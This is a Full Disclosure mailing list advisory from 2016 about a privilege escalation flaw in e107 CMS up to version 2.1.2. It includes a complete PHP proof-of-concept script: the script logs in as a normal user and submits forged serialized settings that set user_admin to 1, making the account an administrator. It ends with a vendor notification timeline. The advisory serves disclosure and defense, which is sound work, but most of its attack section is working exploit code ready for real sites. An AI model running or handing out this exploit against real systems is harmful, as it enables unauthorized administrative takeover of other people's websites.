[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CACoXDXg2SF4vppaUyqL4LEQWAuo1G8PRG5-VCxYjwdsa6nJBfg@mail.gmail.com>
Date: Thu, 10 Nov 2016 16:08:50 +0100
From: Kacper Szurek <kacperszurek@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] e107 CMS <= 2.1.2 Privilege Escalation
# Exploit Title: e107 CMS 2.1.2 Privilege Escalation
# Date: 09-11-2016
# Software Link: http://e107.org/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
Datas from `$_POST['updated_data']` inside `usersettings.php` are not
properly validated so we can set `user_admin`.
http://security.szurek.pl/e107-cms-211-privilege-escalation.html
2. Proof of Concept
<?php
/**
* e107 CMS 2.1.2 Privilege Escalation
* Kacper Szurek
* http://security.szurek.pl
*/
function hack($url, $login, $pass, $cookie){
$ckfile = dirname(__FILE__) . $cookie;
$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array('username' =>
$login, 'userpass' => $pass, 'userlogin' => 'Sign In')));
curl_setopt($ch, CURLOPT_POST, 1);
$content = curl_exec($ch);
if (strpos($content, '?logout') === false) {
die("Cannot login");
}
$data = array();
$data['user_admin'] = 1;
$data['user_perms'] = 0;
$data['user_password'] = md5($pass);
curl_setopt($ch, CURLOPT_URL, $url.'/usersettings.php');
curl_setopt($ch, CURLOPT_POSTFIELDS,
http_build_query(array('SaveValidatedInfo' => 1, 'updated_data' =>
base64_encode(serialize($data)), 'updated_key' => md5(serialize($data)),
'currentpassword' => $pass)));
$content = curl_exec($ch);
if (strpos($content, 'Settings updated') === false) {
die("Exploit probably failed");
}
die('OK!');
}
$url = "http://url_here";
// Standard user credentials
$user = "login_here";
$pass = "password_here";
$cookie = "/cookie.txt";
hack($url, $user, $pass, $cookie);
3. Timeline
22-06-2016: Discovered
22-06-2016: Vendor notified
22-06-2016: Partially fixed -
https://github.com/e107inc/e107/commit/6a306323d4a14045d9ee4fe80f0153a9555fadff
28-06-2016: Regression -
https://github.com/e107inc/e107/commit/0af67301ea2743536ba8f3fe74751e000e3f495d
29-06-2016: Second email to vendor
26-10-2016: Third email to vendor
27-10-2016: Version 2.1.2 Released issue still not fixed
09-11-2016: POC released
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists